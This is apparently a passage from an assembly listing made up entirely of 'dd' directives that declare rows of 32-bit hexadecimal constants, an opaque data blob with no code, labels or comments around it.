		dd 0E2A4069Ah, 0AC79302h, 69D47BB8h, 23608C30h,	14E446B6h
		dd 4B46E7A1h, 748BA178h, 0A110B7FDh, 92D0285h, 0F1A5D434h
		dd 0E00288CAh, 8DB824D0h, 0E0A1281Ah, 0ABAB0D71h, 0C18CCDB6h
		dd 3FB39A22h, 0F7081E6Eh, 4E6285A1h, 3541E52Fh,	11374E3Dh
		dd 0DA0CF08h, 0C5916AD6h, 0BB79EC02h, 0D1B0641Ch, 1DA19884h
		dd 0E089870Ah, 15BA8432h, 54656C45h, 0A695C3CEh, 5D6BFA80h
		dd 0B28B65B4h, 0CD072648h, 0BA523978h, 5C9A6212h, 6D1F16C5h
		dd 9A0E26A4h, 3FCA1765h, 0A9BAA347h, 8DA6DD18h,	3BFBA565h
		dd 0CC6982E7h, 49DF135Fh, 543A566Dh, 75737AE7h,	62030A04h
		dd 3E3B57C2h, 0FF997E8Ah, 0F840152Fh, 0D70B533Eh, 0A1A6C187h
		dd 87C4A076h, 5630703Ch, 8EA2482h, 4E627E08h, 7FAE9B04h
		dd 1FC6461h, 836FE8FEh,	0C14241Fh, 702A8237h, 498EA580h
		dd 38375164h, 85B4246Ch, 0FF6D284h, 0A88DAD12h,	0FAFA92AAh
		dd 4B159EFDh, 0E24353A4h, 0D052455Dh, 0E31710B2h, 0ACFABBFDh
		dd 8439FF11h, 599FE2AEh, 3F882A0Ah, 0D0452417h,	2FD47F48h
		dd 36AB245Eh, 40EAF826h, 0C93FF8B5h, 44B85516h,	5AF7855Bh
		dd 62FE358Ah, 452C365Ah, 0B5007F52h, 941912DEh,	2986ABCBh
		dd 629BA7CAh, 0C392BF00h, 0DF05F955h, 9A85CA70h, 0F0A1A9FAh
		dd 58B8507h, 0AFB027B4h, 0C04352EAh, 0D114DCEBh, 0F56AAF00h
		dd 0D7C8B86Bh, 0C1E93B64h, 0D95ECA07h, 0C18AA1C9h, 9C96E41h
		dd 0E2172541h, 22376DF3h, 0AA1B9ED4h, 406C7865h, 660B5808h
		dd 1B54CA24h, 3BE4441Fh, 123E3AB3h, 848346F8h, 0B4590ABBh
		dd 7E28C6A8h, 0C26E06DCh, 218FE10Ah, 0F74A7F13h, 0F5472E25h
		dd 476AABCFh, 7E3B123Bh, 698F597h, 7845957Bh, 0C12A5795h
		dd 0A10B67DAh, 0B386BE4h, 0E0B9E4DDh, 0ECEBC63Ah, 636B7A0h
		dd 15265B69h, 0AC19247h, 72EA8579h, 37DAEE92h, 949D4F12h
		dd 5062C6E3h, 0BC0879EEh, 0B9E0BE3Bh, 0A5C69798h, 0BAC229E1h
		dd 10E72FE0h, 9C90D55Ah, 4255FCE5h, 25722CBAh, 0FB38DBC6h
		dd 6DF6817Dh, 0D2FABE0Dh, 1413DC95h, 0CFACDFDEh, 0FA57B073h
		dd 69931290h, 0A71351ECh, 68216440h, 930138B4h,	17EFEE0Ch
		dd 4BA6647Fh, 0B067874Dh, 0CE928651h, 7DA92497h, 0C2ADCDB5h
		dd 0F5FCC386h, 8EDBDAA0h, 2DF05A94h, 0CF4F17B6h, 22782555h
		dd 630B9E5Eh, 0F1D33554h, 97F1BAF5h, 0AA857A41h, 0E48204ACh
		dd 97CEA604h, 0D7D59211h, 0A121E055h, 5EB9DE25h, 419E5575h
		dd 8D1D3A6Ch, 211F657Eh, 142B52C5h, 0C061F9A7h,	0D0719F49h
		dd 72B56BABh, 0F22EF952h, 1D57B57Dh, 5D9FA761h,	3BB16289h
		dd 0AD69F594h, 5D9FB346h, 0AEDDCC79h, 3F6CCE3Fh, 0DD256A8Ch
		dd 0BB1367E1h, 0A8DA487Ah, 0B88569EBh, 0E060A14Eh, 8A0495DFh
		dd 40565D65h, 9354B55Dh, 0E6AEACBEh, 151E5CEBh,	42D381B4h
		dd 8F6A459Eh, 6ABEE2AAh, 0A57D7FDh, 778E24ADh, 6CE22CD6h
		dd 0C3E46C6Bh, 0BE6ABE8Eh, 422D8A5Fh, 0D33BEDA3h, 0E6595117h
		dd 461626CDh, 0C011277h, 0B8A8A892h, 21455452h,	4CF73B9Dh
		dd 546056C4h, 1BAA142Fh, 97501552h, 0EFE27CA4h,	0D9E4FA06h
		dd 0B06C2E3Ah, 5B90ABCh, 65563F1h, 1D601353h, 0A2728548h
		dd 708C0500h, 6AD0B768h, 92E63F28h, 564FAB8Ah, 8A6C115Ch
		dd 0CD8C4D1Ah, 7CAABB7Eh, 0F98B9E75h, 9680346Ah, 65B05D64h
		dd 0AF482851h, 48F519C6h, 7072AABFh, 5F468036h,	78765032h
		dd 0AA6CE060h, 9106828Ah, 225CC40h, 0BE885628h,	731101E1h
		dd 780AD05Ch, 74800072h, 0C4C2474h, 43C190Eh, 30063688h
		dd 2224782Dh, 68415A3Eh, 9AD718B8h, 40F96843h, 0C8FFC98Ah
		dd 0BA840AE4h, 0FA226492h, 258F3303h, 527711B7h, 0EA6A8E04h
		dd 97B2C131h, 2941A957h, 88889B08h, 2BBC2EAEh, 54FE57FDh
		dd 0F0F39759h, 4F26707Dh, 80F69CFBh, 445E08EAh,	0BF0C3203h
		dd 92BBC3A9h, 49FC5C3Ah, 7A604080h, 0C6C787E1h,	0B89ECB53h
		dd 0F42D2638h, 0C726ABh, 127D56FEh, 0F0BFE0B8h,	0D383B840h
		dd 52B082C5h, 0F768FA82h, 0AD6B6567h, 3B3B1DA8h, 0BAD0174Bh
		dd 40AC2908h, 2E718102h, 2BA75160h, 0D3209C5Fh,	0B989EBC6h
		dd 7144504Fh, 6EB20D73h, 8E46FF42h, 0CC6D3681h,	0C34D7D71h
		dd 2A872BC0h, 0C1919CDCh, 4772103Ah, 0B5392B30h, 41FC96A9h
		dd 0FA625B02h, 0AF0D8194h, 66A56B4Bh, 37068500h, 74590857h
		dd 0EFE0948Dh, 0A36FD96Ah
		dd 98F1E78Dh, 0AC02A355h, 7F72195h, 0C583024Fh,	2EBD0406h
		dd 5DA00865h, 0A2413BEFh, 627758B2h, 5049F863h,	0B574D610h
		dd 20B0306Bh, 0D028AF0Ch, 1FEE5C5Ah, 468B815Ch,	7D3F41BEh
		dd 0AD21E2F9h, 854C77DFh, 2EA6BA35h, 263E81C1h,	36979A55h
		dd 3DA3B8D6h, 3741E006h, 465760h, 0A49A9104h, 7852DAC0h
		dd 10807D4Ah, 0E3BBC0C2h, 0D32A240Fh, 2EB22715h, 87E1E86Bh
		dd 0A822F1DAh, 0D8671560h, 66083E18h, 0F00C44BDh, 0A019914Ah
		dd 0EC1205C9h, 0C523A94h, 229B2EB6h, 705482B6h,	818D0FFFh
		dd 80BE468Ch, 872CE4Bh,	8A8C9F10h, 3AB08962h, 19A8A1B0h
		dd 46A898C8h, 8312BCD4h, 88282131h, 370C9097h, 0EE91AF31h
		dd 0F08D8020h, 97D1BD46h, 88370D0h, 4C1F1853h, 0E1FF13A2h
		dd 0E3E64923h, 159B55C6h, 0BEEC0B3Ah, 436A5158h, 394D350Ah
		dd 0B11C0EBCh, 84786B0Eh, 0F03AFF6Ah, 581A26A1h, 0D47F4430h
		dd 2003FAA9h, 284DFD66h, 7F83D97h, 41874210h, 90B0BA04h
		dd 61644C1Eh, 286CDB11h, 3980FF52h, 0C83B1619h,	4FFBCADh
		dd 0ABC3A539h, 596A0259h, 9708E974h, 2786E05h, 177360B6h
		dd 0B9701444h, 0E50F2F65h, 0EEA51C96h, 8F48C556h, 0A25A7C85h
		dd 5DEF8FB2h, 0A0BB9114h, 218134CCh, 8285E5F8h,	9835F3Bh
		dd 228E95DAh, 8808B6C2h, 418B0E23h, 6A341126h, 0EBDC133Dh
		dd 85C4ADD7h, 0E00D9E1Eh, 29BEA9D1h, 0A60F675Ch, 7D2B1759h
		dd 0A0388110h, 0D94A07E4h, 0E9C69DF3h, 3D78824Bh, 0CC3AE2h
		dd 6896C1B9h, 52066C39h, 8E20BFB4h, 0B5421876h,	78364E11h
		dd 63371CD7h, 0A8223134h, 810242D6h, 42B18964h,	30D5CE4Bh
		dd 0C49F15AAh, 0AEDD0CBAh, 0F378E052h, 8462DA7Ah, 0E1383A70h
		dd 31D867CEh, 0C1825E0Ah, 83C3B100h, 0E61A22EBh, 4571DD8Ch
		dd 9F6D2EA0h, 97020E49h, 0D6476620h, 0C3B486AAh, 1130E717h
		dd 45BF9773h, 0E2B49304h, 8008A2Fh, 0A80A5681h,	0E8D0C5D5h
		dd 0F6F655D7h, 7CEA662Fh, 97EF3A70h, 9A26817h, 0A5F814Dh
		dd 37D4F9FAh, 0C8DCCF76h, 77FAC6E5h, 7F970192h,	0CC44C4D5h
		dd 0C1F47A1Ah, 0D12AAF9Fh, 748C428h, 0CAE2D507h, 0DF16FC7Fh
		dd 0FC013D8Ah, 40083721h, 0F501DC4Ch, 0F0037DEEh, 10DE402Fh
		dd 0EF10EA84h, 1AC103D1h, 93758C40h, 0C451468Ah, 0FAAE5E2h
		dd 369FD416h, 9A828516h, 1AA50C7Dh, 741A8D74h, 67A80129h
		dd 0EA6F5CB2h, 37628AA2h, 329C0CADh, 709A8D4h, 0A6C48FF7h
		dd 0DD60C052h, 0C411538Eh, 7244709Bh, 0FA526616h, 45FCF57Dh
		dd 51731599h, 65328747h, 0C59F218Fh, 29D7EB07h,	5ECE7900h
		dd 1F5295D4h, 0FBE922FCh, 0FF301CA4h, 85268BA7h, 0C6DF7E6Fh
		dd 224777F1h, 20AD272Dh, 0F1D5C122h, 0FB707E43h, 328A5079h
		dd 3ECBD7C5h, 98F204B0h, 0F3B9AB43h, 0C129A052h, 0B3F0C1FCh
		dd 5DA03832h, 1590A4FCh, 0D7E0CA25h, 908B21C5h,	161E93B2h
		dd 0D38CAD0Ch, 1B4CDCC8h, 0BA9997E3h, 326480BDh, 0C1F00449h
		dd 99CC7F07h, 1E5330EAh, 0CE2483DCh, 32FECB89h,	79030980h
		dd 257CA051h, 0EE2AC691h, 0D2E6E808h, 580AA2BCh, 383F95C8h
		dd 3F061E4Bh, 2413F825h, 75D5567Eh, 876313EFh, 220AF43Eh
		dd 81019FB4h, 80583A0h,	0C9D1200Ch, 333B2CD3h, 0AD5F7340h
		dd 83BC03CBh, 0D2FF154Ch, 8E28444h, 39E9A475h, 88D607D1h
		dd 1D90A636h, 99658024h, 9F30039Ah, 0C0BA3DE3h,	44158D6Ah
		dd 0A303E727h, 57122166h, 0B4177264h, 48C3A0Dh,	0D1DA7B70h
		dd 2A76D18h, 0DB111022h, 0B1D0E163h, 1F8DB075h,	9095C6CEh
		dd 0A45A97A8h, 114BD864h, 0E4CC69C1h, 57070DCAh, 0A760AA95h
		dd 0B003FD04h, 0B69ACAA8h, 0CAA34028h, 8A857BEh, 536CA8A4h
		dd 3A833297h, 0A2B23F03h, 45B9B4ECh, 20CA6DFEh,	0E56C95Dh
		dd 9C8D3829h, 0B5D84D5Ah, 704B0651h, 4A176B14h,	2A8DBAA3h
		dd 1035342Bh, 0BB389345h, 418DE2B8h, 4BDEACB1h,	4297867Ch
		dd 18D1544Bh, 0B5B1B518h, 0CA94495h, 123A457Ah,	1F443385h
		dd 0D1BDA2BBh, 946EE76Fh, 3D11E893h, 1DEB7224h,	0EB53A686h
		dd 5C71CA8Ah, 209191E5h, 0B1CA206Ah, 0D14D8FE3h, 681A2DBFh
		dd 73410B9Fh, 96558AACh, 3C3F5E5Ch, 0B16922E5h,	0B4E905C9h
		dd 55EFC2A6h, 1CEF20ABh, 0DC59B0B3h, 8F5CFF4Fh,	58A7770Dh
		dd 0CFEC3567h, 943428CCh, 24EC2A0Bh, 795335EFh,	7723BAB6h
		dd 9FE86C72h, 0EB0A0482h, 0E2875F5Eh, 0D025C1F0h, 7FBABB0Fh
		dd 62E3CBD1h, 0C48A584Ch, 6ADDA2CCh, 81F59D94h,	77B3D2C5h
		dd 6C14C330h, 0E5F08441h, 0F31643D2h, 2C380103h, 3813AA1h
		dd 0D5F6CC64h, 0EE0A83EFh, 7E0E1246h, 1FCB4092h, 6BA7B093h
		dd 306E54C1h, 5A865951h, 38FFD202h, 0A6E35B07h,	0C070DD3Ch
		dd 3F5FAD4Ah, 0BA45010h, 3142F79Ch, 7C5150DEh, 0D35A0631h
		dd 0F7591491h, 0A0804139h, 0A4284AB9h, 5AA1BF8Dh, 0FD57B64Eh
		dd 8E104877h, 0E8822ACCh, 0EF35175Bh, 2B537AFCh, 67FF4E7Ch
		dd 9F4B0482h, 415591F3h, 2BEA3196h, 268FB548h, 90468687h
		dd 4F0A8528h, 6BDED514h, 69DEC2A5h, 0F2D047C5h,	6C18090Bh
		dd 0FD2933AEh, 51047FAh, 9C2D4B00h, 0D936AE38h,	0E13D1297h
		dd 0DF272F9Eh, 4DCCFCC6h, 75CC0B39h, 0C0087B24h, 0F7594510h
		dd 7B17FFA1h, 0C2F9830h, 70F03CC9h, 1988D72Ch, 0BB96273h
		dd 25036BD6h, 0B090C64h, 90AC26EBh, 11E750ADh, 4122B82Fh
		dd 88B1E068h, 0A048F4B3h, 0D0062838h, 0C516F0BCh, 52013578h
		dd 440198EAh, 31D50B51h, 1A1683ADh, 6468E5A6h, 0A2CF8B5Fh
		dd 0A1EF1F40h, 0D6A32CE1h, 7EF884CEh, 0F17C73F8h, 0D5A7D522h
		dd 0DEDD11B0h, 6EF3D684h, 0FE6F1BACh, 0D09910B4h, 0E3AF91BDh
		dd 0BC4CBBD8h, 32222590h, 785289Dh, 31DE79Ch, 0A04D2EBFh
		dd 0AA281735h, 82239939h, 4098643h, 0D4EE1B79h,	0C528F1C8h
		dd 81C53AB8h, 5804DF09h, 0C049E0A4h, 31A676CAh,	71A5C4C2h
		dd 0B280A08Bh, 2AF3A08Dh, 0C2854557h, 31A91682h, 0AFFB004h
		dd 0C5F34AFCh, 0A1654AE4h, 0FEF040E2h, 183FF462h, 0B6981E48h
		dd 2AE1A62h, 6D15EFD3h,	1C75B28h, 0F6039D5Bh, 0B7301107h
		dd 1351240Eh, 9B83FB06h, 39C656ABh, 991E3BE6h, 46201C48h
		dd 97B8380Ah, 1AE82DD6h, 0F9F385D2h, 0E15DF640h, 0F1A53864h
		dd 1843A6D8h, 51F6D6C4h, 0F03982A2h, 0BDA9A02Eh, 983F858Fh
		dd 7E535AE1h, 50ACEABFh, 66D00C6Dh, 480A7157h, 974AA818h
		dd 0F5B4D4FFh, 61A2F634h, 0D5C21F0Fh, 70308A06h, 748BF103h
		dd 88CE753Bh, 85E019EBh, 6F8B2F3h, 4C140EF4h, 43C65AFFh
		dd 8ED658A3h, 175D3D07h, 0BB34A34Dh, 18770AB4h,	0F4B13AB9h
		dd 8A50C65h, 344D9AF5h,	0CE6CEBE3h, 6F8228C0h, 0C1CF773Bh
		dd 0C5E7EB2Ah, 21B4679Eh, 6AFCF2E9h, 68EB0110h,	7E1A221h
		dd 6A807B51h, 0F1504251h, 840D4BFh, 1A596605h, 0AA6A6CCBh
		dd 865D3522h, 541F7368h, 3E402265h, 0D102CEA9h,	89A43170h
		dd 73525629h, 3A4C431Ah, 3AFEAC8Dh, 0C860567Ch,	0C2F090E5h
		dd 8500EF70h, 0AE5EF55Ch, 0ECCD1194h, 1363E954h, 0D85362E8h
		dd 0BFC5354Bh, 80DCF3F4h, 46096CA6h, 8558B14Dh,	2E68D7B7h
		dd 205EC721h, 77CB42F9h, 0BA438E6Ch, 0ADCF5140h, 553357F2h
		dd 5455F8Dh, 0C6854D44h, 8A3070AAh, 54E879FCh, 0C1FEAE10h
		dd 9D13460Fh, 2CFC4C3h,	40AC8135h, 54187878h, 2457DA97h
		dd 0AB7600D0h, 86AF3A4Bh, 0BF85A69Ah, 0C1956593h, 0AC35D218h
		dd 5BF4010Bh, 0AD9D5F8Dh
		dd 39BB5154h, 8634CCE4h, 577C34EAh, 20C22203h, 6D20ADC5h
		dd 0C33193ECh, 0FE294C21h, 0DBE71895h, 8ED533BFh, 747E217Eh
		dd 401BEA0Ch, 7AE9555Ch, 201C14FEh, 8E5EA3A1h, 33F16B6h
		dd 48DA572Eh, 4A7F9337h, 0D61CFE1Fh, 0DA0B9C17h, 655F67E7h
		dd 7D620382h, 920B58DAh, 0D5026520h, 0A889A452h, 8C8FA992h
		dd 0E5806FCCh, 125184AEh, 534AEB54h, 0FAE2D9C5h, 0C55D6209h
		dd 419BCE83h, 0DF567DEBh, 2A13DC9Ch, 10E86F21h,	0C8A977AEh
		dd 0BB695E2Eh, 0BBF5FADh, 67FE1F6Ah, 573F3390h,	25E2A416h
		dd 88E2F498h, 0A02A178Bh, 430B2046h, 3E16A969h,	30C36F8Bh
		dd 0C241A3EAh, 0CA2A42E8h, 14F8B865h, 6BD0B965h, 0F87F7AE2h
		dd 563BA2ECh, 9F17CB8Dh, 7ED7EB83h, 75711215h, 51C52FFEh
		dd 132494FBh, 49A672A6h, 2E97FB37h, 0C4720EFEh,	1BD75972h
		dd 40FF8C64h, 285F2DC5h, 0D4AF4C0h, 0DD62D9F6h,	31B9186Ch
		dd 764A6A58h, 9FBC4A9h,	0AA5539FBh, 9D79270Eh, 5A1117FEh
		dd 0BC405D30h, 0A38BFE44h, 209B91EFh, 9D549172h, 70E05331h
		dd 0DEC3C59Dh, 0FFB558F8h, 0CE3600A7h, 6FA38400h, 0FAFB9B9Ch
		dd 0D1DFA052h, 0FC169F06h, 0C004A36Dh, 0CD8D45Fh, 55D19C40h
		dd 0F40921BCh, 5835310Ch, 6980CB5Dh, 17C9C8B2h,	222CBEEAh
		dd 8F9864D2h, 1486BD99h, 0E8D21E74h, 0B9AF1F78h, 0B49D2F90h
		dd 0C0D3EFBAh, 0D1647475h, 0A010A0C1h, 0E5342508h, 1F7BEE7h
		dd 0CA24662h, 0E3EF3E5Ah, 289788D5h, 3664212Ch,	3FF355D9h
		dd 89295665h, 0CE120084h, 38A8DF78h, 926B3404h,	27309CCFh
		dd 86BA4DFh, 5F38033Bh,	0E0EE3115h, 0A591307Bh,	1C4DF368h
		dd 6784CC5Dh, 5C29C1FCh, 79580E71h, 54F96482h, 260BBC4h
		dd 473F0D2Ch, 0A1593F1Eh, 82BB4F01h, 0EC278200h, 0E504329Bh
		dd 1DA00631h, 6676CB54h, 0A6324825h, 0BD86BBC8h, 49851F87h
		dd 0A005CFFEh, 5823579h, 518162AEh, 34B7D988h, 0BB83B80Ah
		dd 2112A3D3h, 0FC0A77EBh, 0A02B282Ah, 6B2D4F60h, 16BA2C2Dh
		dd 4480488Fh, 534195BAh, 0D0E8E274h, 617A7907h,	4927365Eh
		dd 4C8FC430h, 0A181358Dh, 0C941AC9h, 0D4D941B9h, 26F56D47h
		dd 1FA82B4h, 903BA943h,	0A6ED58ACh, 0FF15B020h,	69D38BBFh
		dd 8306D062h, 0E6231BF1h, 6A55F9BAh, 17219A17h,	0CAC68714h
		dd 0B0343D1h, 2BBD121h,	23878Eh, 0EA6D4A1Eh, 5E8C10A8h
		dd 0C7F1E043h, 8DD26BFEh, 0A300A4D1h, 0B4E19374h, 0BE2DA5A0h
		dd 0EA330B62h, 335305AEh, 82C41798h, 0D975766Ah, 0C12F84EEh
		dd 516A8850h, 20D44553h, 0C9A86BB5h, 14D6EBDDh,	0BA0798D5h
		dd 5D622D46h, 90193C9Bh, 8D0CF803h, 44B0A178h, 0F2662FC9h
		dd 246B48A4h, 0E8960DF3h, 0B2292A1Fh, 87347116h, 83F7241h
		dd 0ADE8CDA4h, 2EA8D054h, 2F087D91h, 2B087B91h,	6F237991h
		dd 0B6F87792h, 0C22A18AFh, 7BF7A679h, 0B98AB7BBh, 0D654EBE3h
		dd 0BA6FA2F9h, 75E62338h, 8AFD431Bh, 221A38E0h,	98676083h
		dd 4C049C24h, 263E875Dh, 8409FC0Fh, 903CE4BAh, 0AB22EB01h
		dd 0B4A6A9A1h, 390785D2h, 0A0503948h, 8421BF29h, 8A7C0A00h
		dd 7E240504h, 5C401105h, 59AE38F4h, 0C1735291h,	31B56F5Bh
		dd 0E1CBE668h, 3B8ADF66h, 851C1867h, 0BF392899h, 0C120E3Ah
		dd 95C4A782h, 0E7BDA333h, 9E6FD9BEh, 0E318175Bh, 0ED8070A1h
		dd 4392C7FAh, 69638D07h, 505D99A0h, 0BCD3C0A8h,	3F560AFh
		dd 9BE4297Bh, 8AE8F70Fh, 0C9B42986h, 0A660FA34h, 128A81A0h
		dd 0ACB6FE0Eh, 0C06F4A4Eh, 997B0060h, 939C2029h, 7CD07354h
		dd 0D5D9168Eh, 302C3354h, 0D6295F04h, 1650824Ah, 63A99E0Eh
		dd 0C3F66CE4h, 0E2EA7493h, 0EBD7F47Fh, 96C334B2h, 0CF8B82BBh
		dd 0D748415Fh, 6C11FA7Bh, 0DC50B0AAh, 2013D70h,	82A4C62h
		dd 6AB355E0h, 389EC744h, 0CB2F78B8h, 72FACEF8h,	0E1485749h
		dd 0FC37235Ch, 7666176Dh, 0E2393965h, 0BA33B87h, 0C7B3995Fh
		dd 4047F869h, 35DE0A4Eh, 9BDFA192h, 351B0E15h, 18655905h
		dd 0E88D0B82h, 8CF51EDAh, 9ACE6535h, 0A057C080h, 0D5A66B1Dh
		dd 425B6A38h, 0C051E8A9h, 0BCF8B47h, 0B0DC60F3h, 95CA071Fh
		dd 606E7628h, 101B9C20h, 0F5D09495h, 75BD2DE0h,	7F773173h
		dd 0FEEA180Fh, 0BECDC5D2h, 0C794C0C2h, 861F0884h, 0A042D39h
		dd 0DC5CCBF2h, 0A0522038h, 0DAF4B46Dh, 7B48FA12h, 23582927h
		dd 0C1D87F2h, 2757FC4Dh, 0E4205B90h, 0DA6B8209h, 1FA2472h
		dd 0A3A9AC3Bh, 0F7AEB396h, 24B9D06h, 0C3637D39h, 28E8F40Dh
		dd 96BA037Dh, 778DF91Dh, 0AA30E670h, 0F2B45D80h, 40213673h
		dd 48531155h, 0FA663597h, 877E76CDh, 0DE67317Dh, 0FD218982h
		dd 8032F650h, 31800C1h,	0E53DA2F8h, 0D08045AFh,	1AF68C42h
		dd 0C0280C78h, 6041035Ch, 4F7D602Ah, 0C5DF3533h, 63753396h
		dd 9D724DE0h, 46A7AA47h, 4E2A1ABAh, 30982158h, 0C5091D55h
		dd 0BE76D223h, 2B13602Fh, 9A04AA23h, 2DBACC3Eh,	316CF277h
		dd 86B5C2D4h, 6E0BBC46h, 69BA5153h, 9786298Dh, 21591092h
		dd 60B4D3D7h, 0EAC71CB8h, 0F1A8BA0Fh, 8AD16D84h, 56CFE9Eh
		dd 49C84D2Dh, 0D5DED4DAh, 2084A8F9h, 8A067C41h,	478CE4A5h
		dd 30580825h, 0A1C45B91h, 0E392B4E4h, 2462812Dh, 1B212438h
		dd 60FB0A58h, 5D221252h, 40581E90h, 0D0FDA029h,	1EB8D920h
		dd 0F664FB7Eh, 155422D0h, 9030C440h, 3EE00BAEh,	80822C81h
		dd 3BEB600Fh, 97C57A31h, 9C3B5FE2h, 0C1F4996Bh,	0ED35EFD8h
		dd 96C68896h, 0A4DCAE71h, 0E2EA8EE2h, 0B75EEC5Fh, 4254171Dh
		dd 22BF298Ah, 0AFFD9852h, 58A9561h, 8BE33FC2h, 775850A9h
		dd 7108C2F8h, 0AE6C202Eh, 9FFAE376h, 3D174F7Bh,	353B6ABFh
		dd 5EC6F830h, 0A1303514h, 5FD866A4h, 8330EE45h,	9CA87E0Fh
		dd 5C029F9h, 3F092A66h,	62219F68h, 5F33281Ch, 0EA9D4EFh
		dd 8C3D1B85h, 0F99A5F1Ah, 11DCC4F0h, 15514AB3h,	0F3B0BA53h
		dd 818AEEC5h, 770D1399h, 1A0208A6h, 0EB998067h,	0C0937281h
		dd 4A77526Ch, 0FD250634h, 1D1FCEBAh, 3EE56A7Eh,	1165C7AEh
		dd 9809A249h, 84148283h, 0A902C298h, 97DD23BEh,	479FC370h
		dd 0E18C82EAh, 0BB15B5A0h, 0AF3E92DCh, 0A2A54B33h, 0C4B58230h
		dd 4ACD2DF5h, 0C08D0C14h, 79ECC20Dh, 62EBC2D2h,	594EE222h
		dd 1E52BC09h, 0C421C006h, 0AF414AFFh, 4A9A9EDBh, 263ED5A6h
		dd 7ED7BA24h, 1B0050BEh, 9BC852ABh, 50CA452h, 0F18844A6h
		dd 5E1D56E5h, 54480EDh,	58B50D8Ah, 0DE0FC01Ch, 0E9511A0Ch
		dd 0FCFBAF62h, 61A66D82h, 0DB411F8Fh, 0BB24DE0Ch, 60E07A82h
		dd 6428985Fh, 0BC54BC50h, 3F39C589h, 0A468B5D6h, 0C91048Bh
		dd 19F1670Bh, 2BB02092h, 0F5C42CCCh, 798AB1C1h,	0A0DDCD53h
		dd 9A99E448h, 90AF5066h, 8268595Ch, 9029156h, 554A6659h
		dd 0BBE6DACh, 6503304Eh, 711BC04Dh, 0F098ACBh, 60F38C54h
		dd 5371C059h, 7531A957h, 96EC8D9Ch, 75095D05h, 6AEC87D1h
		dd 32F61C7Dh, 750505E8h, 8912AE8Eh, 0AD8131AEh,	8F57EB6Eh
		dd 0FE09E2AFh, 95002786h, 88089D9Bh, 0D525893Bh, 0D89456D2h
		dd 6377E44Bh, 58038C18h, 0A721341Fh, 0C0EB2EABh, 0A3031075h
		dd 945D824Fh, 0FC43E329h, 41198D95h, 4880F05Ah,	3F83C0FEh
		dd 1F53CDCAh, 45829EF7h, 9D6462BAh, 5025E0E7h, 0F53C43CCh
		dd 55FA2BD5h, 2B7F4010h, 8AF03025h, 0F0C76536h,	30104F99h
		dd 0ABE730CBh, 0C9328B94h, 0D0C8A5FFh, 7C7DBA4Bh, 60FD6431h
		dd 64B4D03Dh, 9C8E24E1h
		dd 61779E05h, 734032h, 8201794h, 22721BB4h, 0E802219Ch
		dd 35910147h, 506C3180h, 779FF471h, 7280441Dh, 1602C2D4h
		dd 3DEC3102h, 65085A4h,	0EB981F1Ah, 2CC56905h, 50B8B37h
		dd 88408C13h, 89A648A0h, 0C489028h, 491645B2h, 1EB0360h
		dd 8A668ECAh, 100210C8h, 0AF09C077h, 0B4253804h, 0B0965C12h
		dd 8EF2604Ah, 0E3CA2E89h, 0A096624Ah, 0F04B810Fh, 255237BDh
		dd 2085D808h, 0AA5F3A04h, 0A5FCF448h, 3608848Ah, 0C46048AEh
		dd 7F86AE66h, 665B7F02h, 80236DB1h, 0B893D537h,	0FF3DC84Bh
		dd 0A246E658h, 0BFB15906h, 0FB820C51h, 401884A7h, 898D504Bh
		dd 7F8B28C5h, 0A42FBA4Ch, 23D0F71Ch, 6FF54911h,	0E0F0B448h
		dd 889FB90Fh, 8D57D02Fh, 0DE0C7ECAh, 9F98C2F6h,	543DA4A2h
		dd 0D49425C9h, 0ED180E4Ah, 15404A25h, 8E2DB2h, 0B88131BCh
		dd 0E028121h, 0B943A87Eh, 1EB38F27h, 996FE42Dh,	1892226Ch
		dd 8E999A71h, 20CF52B3h, 0CD880B45h, 0C8317A90h, 14A562AEh
		dd 0F7014736h, 40A2A748h, 15657103h, 971C4B3Bh,	25FCCD01h
		dd 201EFA34h, 46280118h, 2922C300h, 946C9471h, 15025374h
		dd 4552A389h, 552818C2h, 52868A24h, 28428245h, 82242455h
		dd 0CF144552h, 800C5549h, 46D024CAh, 4A4ED600h,	35B9142h
		dd 3C083CD7h, 78C24A46h, 79B36A44h, 2AD88A29h, 9756F9B7h
		dd 7E244EFh, 286FABDDh,	5772F87Ah, 5F8AF777h, 96F54D65h
		dd 0F4A21EC5h, 3BACCC55h, 193B277Fh, 0B5CD1311h, 51A7D93Ah
		dd 0A40E02A1h, 0F9875C3Bh, 802E9F75h, 0F74158h,	0BCA52BB9h
		dd 47F401FDh, 0E5B556B9h, 6ACD956Ah, 39825D99h,	413AD64Fh
		dd 8667F41Fh, 86373EEAh, 9D7FE3C0h, 66150DE8h, 0A078B3B2h
		dd 62FE206Ah, 4AAFFD48h, 81AA175Eh, 0A08C8F00h,	20FFF8ECh
		dd 96489387h, 22A799E1h, 7F675EB7h, 20460516h, 8CD13CF4h
		dd 551558D1h, 0D192A4B5h, 28A98885h, 157ED737h,	940ABE4Dh
		dd 0AA0A0758h, 1F338ED2h, 54DC1451h, 0A3BED094h, 0B30AA33Fh
		dd 0AE3F8566h, 0AECF4AF1h, 70CEA414h, 0ABADE0B2h, 5AD0613Ch
		dd 8A7874E4h, 418353CAh, 386C2788h, 0A815E829h,	8AD48B67h
		dd 98FB9047h, 0AE1202F7h, 275DC9F2h, 1EC79C30h,	20C24B44h
		dd 179E7CC5h, 76164B02h, 97BE3412h, 0DFEC908Bh,	10F5BCBBh
		dd 4873FB2Bh, 0E7FFFE0Ah, 432BB8Eh, 0AF2CA2C4h,	0AB21E5EBh
		dd 5F2C62CAh, 64359CE5h, 8AC0D955h, 5FD1658Eh, 0F1AE5068h
		dd 0D62B0C9Dh, 0AB3D9DA7h, 0FB93ABCAh, 715D2CC6h, 0B7F499A8h
		dd 40793B78h, 0BB4F7848h, 914660E7h, 44BBEAECh,	0AE19AD00h
		dd 0E0C02422h, 0ABF50B6h, 0A3F1523Ch, 0C2DDBAEDh, 279EE202h
		dd 0A6D9C2C1h, 0A4B4D2A4h, 0D4005452h, 0EBB749B6h, 71C54AA9h
		dd 0FD80D880h, 0F1EBF1B7h, 7A801D9Dh, 0EE5F3738h, 9C2A1A7Dh
		dd 0A47911A4h, 0DA00B6ECh, 0D9F5748Dh, 7027A99Ah, 81693BC2h
		dd 989476A6h, 45B57D16h, 69B8A939h, 60911D61h, 5AF14A33h
		dd 80438369h, 0C4342662h, 57AE8AA2h, 1D7544D2h,	962B2BADh
		dd 68404665h, 0AAFC1754h, 791637ACh, 4C41B936h,	0D2B7C1DBh
		dd 2C102737h, 0CA9E286Eh, 3D7E0A29h, 23C6E69Ch,	0E3F8AB44h
		dd 8DACD606h, 8085DB1Dh, 8A2ADA22h, 0DA0C0C2Ch,	4410F602h
